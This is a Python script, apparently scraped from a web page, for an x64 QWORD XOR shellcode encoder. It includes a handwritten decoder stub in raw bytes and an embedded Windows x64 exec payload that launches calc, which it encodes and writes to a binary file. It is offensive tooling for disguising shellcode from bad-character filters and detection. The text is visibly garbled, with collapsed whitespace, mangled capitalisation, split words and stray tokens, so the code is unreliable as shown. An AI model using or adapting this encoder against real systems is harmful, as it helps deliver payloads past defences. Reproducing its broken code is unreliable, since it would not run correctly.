#!/usr/bin/env python#filename:xor_qword_x64.py#coding=utf-8import reimport sysimport randomimport structclass Qwordxorencoder:def __init__ (self): Self.name = "x64 QWORD xor Encoder" self.description = "x64 QWORD xor Shellcode Encoder" Self.author = "Danny__wei" Self.bad_chars = [] Self.bad_keys = [[] for I in a range (8)]self.good_keys = [[] for I in R Ange (8)]self.final_keys = []self.shellcode = "" Self.encoded_shellcode = "" Self.encoded_payload_length = 0self.encoder_ Bad_chars = ["["], "+", "C9", "Bayi", "E9", "8d", "to", "BB", "" "," "2d", "F8", "FF", "E2", "F4"]self.misc_comments = "" "#This is the decoder stub" \X48\X31\XC9 "+ # XOR RCX, RCX" \x48\x81\xe9 "+ Block_count + # Sub ecx, Block_count "\x48\x8d\x05\xef\xff\xff\xff" + # Lea Rax, [rel 0x0] "\x48\xbbxxxxxxxx" + # mov rbx, 0x?? ??????????????" \x48\x31\x58\x27 "+ # XOR [rax+0x27], RBX" \x48\x2d\xf8\xff\xff\xff "+ # sub Rax,-8" \xe2\xf4 " # loop 0x1B "" "" Def all_the_stats (self):p rint "\n[output] Encoder name:\n" + self.namestring_bad_chars = "' For Bchar in Self.bad_ch Ars:string_bad_chars + = Hex (Bchar) + "print" \n[output] bad Character (s): \ n "+ string_bad_charsprint" \n[output] Shellco De length:\n "+ str (self.encoded_payload_length) j = 1;key = 0for I in Self.final_keys:key + = i * JJ *= 0x100print (' \n[out Put] Xor key:\n%08x '% Key) def shellcode_to_bin (self): hfile = File (' Xor_x64_encoded.bin ', ' wb+ ') hfile.write ( Self.encoded_shellcode) hfile.close () Returndef set_shellcode (self, shellcode): Shellcode = Shellcode.decode (' String-escape ') Self.shellcode = ByteArray (shellcode) return# This function is copied from Justin Warner (@sixdub) def set_ Bad_characters (self, bad_characters): Final_bad_chars = []bad_characters = Bad_characters.split (' x ') # do some Validation on the received Charactersfor item in bad_characters:if item = = ":p asselif item in Self.encoder_bad_chars:prin T "\n[error] Encoder Error:bad character specified is used for the Decoder stub. " Print "[Error] Encoder error:please use different bad characters or another encoder!" Sys.exit () Else:if len (item) = = 2: # Thanks Rohan (@cptjesus) for providing this regex code, and making Me too LAZT # to do it myselfrohan_re_code = Re.compile (' [a-f0-9]{2} ', Flags=re. IGNORECASE) if Rohan_re_code.match (item): Final_bad_chars.append (item) else:print "\n[error" Bad Character Error: Invalid bad character detected. " Print "[Error] bad Character error:please provide bad characters in \\x00\\x01 ... format." Sys.exit () else:print "\n[error" Bad Character error:invalid bad Character detected. " Print "[Error] bad Character error:please provide bad characters in \\x00\\x01 ... format." Sys.exit () for x in final_bad_chars:self.bad_chars.append (int ("0x" +x,16)) Returndef Find_bad_keys (self): for key in Range (0x100): for ill in Self.bad_chars:char = key ^ badfor Count of Xrange (8): For I in Xrange (count, Len (Self.shellcode), 8): if char = = Self.shellcode[i]:seLf.bad_keys[count].append (Key) Breakreturndef Find_key (self): for count in Xrange (8): Is key in range (0x100): If key not in Self.bad_keys[count]:self.good_keys[count].append (key) for count in Xrange (8): If Len (self.good_keys[count]) = = 0: Print "\n[error] Encoder Error:can ' t find available keys." Print "[Error] Encoder error:please use different bad characters or another encoder!" Sys.exit () i = random.randint (0, Len (self.good_keys[count)) Self.final_keys.append (Self.good_keys[count][i]) Returndef decoder_stub (self): Block_count =-(((Len (Self.shellcode)-1)/8) + 1) str = struct.pack (' <l ', Block_count) Decoder = "\X48\X31\XC9" + "\x48\x81\xe9" + str + "\x48\x8d\x05\xef\xff\xff\xff" + "\x48\xbbxxxxxxxx" + "\x48\x31\x58\x27" + "\x48\x2d\xf8\xff\xff\xff" + "\xe2\xf4" "decoder =" \x48\x31\xc9 "+ # XOR RCX, RCX" \x48\x81\xe9 "+ bl Ock_count + # sub ecx, Block_count "\x48\x8d\x05\xef\xff\xff\xff" + # Lea Rax, [rel 0x0] "\x48\xbbxxxxxxxx" + # mov rbx, 0x???????????????? "\x48\x31\x58\x27" + # XOR [rax+0x27], RBX "\x48\x2d\xf8\xff\xff\xff" + # sub Rax,-8 "\xe2\xf4" # loop 0x1B ' return decoderdef Do_encode (self): stub = Self.decoder_stub () key = 0str = "for key in Self.final _keys:str + = Struct.pack (' B ', key) Stub = Stub.replace (' XXXXXXXX ', str) # Check out the final decoder stubfor byte in Bytear Ray: If byte in Self.bad_chars:print "\n[error] Encoder Error:bad character specified are used for the decoder stub." Print "[Error] Encoder error:please use different bad characters or another encoder!" Sys.exit () Stub = ByteArray (stub) mod = 0byte = 0count = 0for byte in ByteArray (Self.shellcode): if count < 8:mod = Counte Lse:mod = count% 8count + = 1enbyte = byte ^ self.final_keys[mod]stub.append (enbyte) Self.encoded_shellcode = Stubself.enco Ded_payload_length = Len (stub) Returndef encode (self): Self.find_bad_keys () Self.find_key () Self.do_encode () if __name_ _ = = ' __main__ ': Shellcode = ("\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51 "" \x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52 "\ X20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0 "" \xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\ X41\x01\xc1\xe2\xed "" \x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88 "" \x00\x00\x00\x48\x85\ xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44 "" \x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48 " "\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1" "\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\ x39\xd1\x75\xd8\x58\x44 "" \x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49 "" \x01\xD0\x41\x8B\ x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a "" \x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\ x41 "" \x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00 "" \x00\x00\x00\x00\x00\x48\x8d\x8d\x01\ x01\x00\x00\x41\xba\x31\x8b "" \x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff "" \xD5\x48\x83\ Xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47 "\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c\x63\x00") shell = Qwordxorencoder () Shell.set_shellcode (shellcode) shell.set_bad_characters (' x00x0a ') Shell.encode () shell.all_the_ Stats () Shell.shellcode_to_bin () Else:pass
x64 QWORD Xor Shellcode Encoder